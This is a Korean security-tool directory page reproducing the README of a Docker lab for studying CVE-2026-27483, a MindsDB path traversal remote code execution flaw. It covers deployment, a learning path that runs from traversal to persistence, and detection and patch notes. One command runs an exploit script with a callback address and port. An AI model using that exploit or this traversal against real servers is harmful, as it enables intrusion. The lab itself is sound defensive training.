Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2026-27483-lab — CVE-2026-27483을 연구하고 방어하기 위한 컨테이너화된 엔터프라이즈 스타일의 실험실 | Kitploit
도구/GitHubGitHub/nabhan-mohy/cve-2026-27483-lab
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingThreat IntelligenceLearning & EducationIncident ResponseLabs & Practice
GitHubnabhan-mohy/cve-2026-27483-lab

cve-2026-27483-lab

CVE-2026-27483을 연구하고 방어하기 위한 컨테이너화된 엔터프라이즈 스타일의 실험실

저장소 보기
8일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-27483 실습 환경 - 엔터프라이즈 취약점 학습 환경

Status Version MindsDB CVE

CVE-2026-27483(MindsDB 경로 탐색 RCE)을 학습, 테스트 및 방어하기 위한 완전하고 현실적인 엔터프라이즈급 Docker 기반 실습 환경입니다.

🎯 빠른 시작

root@kitploit:~
# 저장소 복제
git clone https://github.com/nabhan-mohy/cve-2026-27483-lab.git
cd cve-2026-27483-lab

# 환경 파일 복사
cp .env.example .env

# 실습 환경 배포 (약 2~3분 소요)
docker compose up -d

# 배포 확인
docker compose ps

# MindsDB 상태 확인
curl http://localhost:47334/api/status

# 학습 시작!
open http://localhost:8080  # 리버스 프록시 대시보드

📋 환경 개요

root@kitploit:~
인터넷 (공격자)
    ↓
리버스 프록시 (nginx)
    ↓
┌─────────────────────────────────┐
│  MindsDB (취약)                 │  포트 47334
│  - CVE-2026-27483에 취약        │
└─────────────────────────────────┘
    ↓
┌─────────────────────────────────┐
│  PostgreSQL 데이터베이스         │  포트 5432 (내부)
│  - MindsDB 데이터 저장           │
└─────────────────────────────────┘
    ↓
┌─────────────────────────────────┐
│  ELK 스택 (로깅)                 │
│  - Elasticsearch, Logstash      │  포트 9200, 5000
│  - Kibana 대시보드               │  포트 5601
└─────────────────────────────────┘

🚀 배포 옵션

옵션 1: 전체 엔터프라이즈 실습 환경 (권장)

root@kitploit:~
docker compose up -d

옵션 2: 최소 실습 환경 (MindsDB만)

root@kitploit:~
docker compose --profile minimal up -d

옵션 3: 모니터링 포함

root@kitploit:~
docker compose --profile monitoring up -d

📚 문서

  • 아키텍처 - 시스템 설계 및 구성 요소
  • 배포 가이드 - 단계별 설정
  • 도전 과제 - 5개의 학습 레벨
  • 탐지 - Sigma/SPL 규칙
  • 사고 대응 - 조사 가이드
  • MITRE 매핑 - ATT&CK 기법

🎓 학습 경로

  1. 레벨 1: 정찰 - 취약한 애플리케이션 발견
  2. 레벨 2: 경로 탐색 - 파일 업로드 취약점 악용
  3. 레벨 3: RCE - 원격 코드 실행 달성
  4. 레벨 4: 지속성 - 접근 유지 및 권한 상승
  5. 레벨 5: 방어 - 취약점 패치 및 탐지 생성

🔧 일반 명령어

root@kitploit:~
# 로그 보기
docker compose logs -f mindsdb
docker compose logs -f elasticsearch

# 서비스 접속
curl http://localhost:47334/api/status         # MindsDB API
http://localhost:5601                          # Kibana
http://localhost:8080                          # 리버스 프록시

# 실습 환경 중지
docker compose down

# 초기 상태로 재설정
./scripts/reset.sh

# 도전 과제 실행
python3 exploits/exploit.py -t localhost -lh YOUR_IP -lp 4444

# 탐지 규칙 보기
cat rules/sigma/cve-2026-27483.yml

📊 마일스톤

  • ✅ M1: 기반 - Docker, 네트워킹, 문서
  • 🚧 M2: 엔터프라이즈 환경 - 프록시, 데이터베이스, 로깅
  • 🔄 M3: 엔터프라이즈 자산 - 데이터, 사용자, 구성
  • 📋 M4: 탐지 및 조사 - 규칙, 대시보드
  • 📖 M5: 전체 문서 - 가이드, 템플릿

🛡️ 보안 참고 사항

⚠️ 이 실습 환경은 의도적으로 취약한 소프트웨어를 포함합니다

  • 격리된 비프로덕션 환경에서만 사용하십시오
  • 공용 네트워크에 노출하지 마십시오
  • 학습 및 허가된 보안 테스트 전용입니다
  • 관련 법률 및 윤리 지침을 준수하십시오

🤝 기여

기여를 환영합니다! 자세한 내용은 CONTRIBUTING.md를 참조하십시오.

📝 라이선스

MIT 라이선스 - 자세한 내용은 LICENSE를 참조하십시오.

🏆 크레딧

  • 취약점 발견: XlabAITeam
  • 최초 PoC: Lohitya Pushkar (thewhiteh4t)
  • 실습 환경 개발: 보안 연구 커뮤니티

보안 커뮤니티를 위해 ❤️로 제작됨 | 이슈 | 토론


CVE-2026-27483: MindsDB 경로 탐색 RCE 분석

설명: 이 저장소는 MindsDB의 경로 탐색 취약점인 CVE-2026-27483에 대한 포괄적인 단계별 분석을 제공합니다. 이 결함(25.9.1.1 이전 버전)은 인증된 공격자가 서버에서 임의로 파일을 쓰는 업로드(PUT /api/files)를 조작할 수 있게 합니다. 우리는 Docker 실습 환경에서 이 문제를 안전하게 재현하고, 그 영향을 포착했으며, 근본 원인, 악용 메커니즘, 패치 차이, 탐지 전략을 문서화했습니다.

저장소 내용:

  • 아키텍처 및 개요: MindsDB 구성 요소 및 서비스의 토폴로지.
  • 취약점 세부 정보: CVE 설명, 영향받는 버전, 영향.
  • PoC 분석: 공개된 악용 단계와 페이로드 구조 분석.
  • 근본 원인: 취약한 코드와 경로 검증이 실패한 이유에 대한 심층 분석.
  • 실습 환경 설정: 환경 복제 방법(Docker 이미지, 구성).
  • 정찰 및 재현: 로그, HTTP 요청, 코드 실행 증거(정제됨).
  • 패치 분석: v25.9.1.0에서 25.9.1.1로의 코드 차이(수정 내용 표시).
  • 탐지 및 완화: 이 공격 탐지(로그, 알림)에 대한 지침 및 예방 모범 사례. ✔️ 안전한 재현: 모든 테스트는 통제된 실습 환경에서 수행되었습니다. 저장소에는 무기화된 악용 코드나 페이로드가 포함되어 있지 않습니다. 대신, 문제와 그 수정 사항을 설명하기 위해 정제된 요청 예제, 차이 스냅샷, 로그 발췌문을 포함합니다.

✔️ 탐지 팁: 의심스러운 지표(예: ../이 포함된 업로드 파일명, Python 패키지 수정, 비정상적인 핸들러 설치)를 설명하고 MITRE ATT&CK 기법을 참조합니다.

✔️ 크레딧 및 참고 자료: 이 취약점은 Tencent Xuanwu Lab에서 발견했습니다. 배경 정보는 공식 권고와 NVD 항목을 참조하십시오.

시작하기: 사용자는 자세한 분석을 위해 docs/의 Markdown 문서를 탐색할 수 있습니다. 아키텍처 문서는 시스템 설정을 설명합니다. 안전한 재현 문서는 RCE를 검증한 방법(로그 및 출력 포함)을 보여줍니다. 패치 비교는 버전 25.9.1.1이 문제를 어떻게 수정하는지 설명합니다.

연락처 및 기여: 이 프로젝트는 정보 제공 목적입니다. 질문은 Issues를 사용하십시오. 라이선스 조건은 LICENSE를 참조하십시오.

도구 다운로드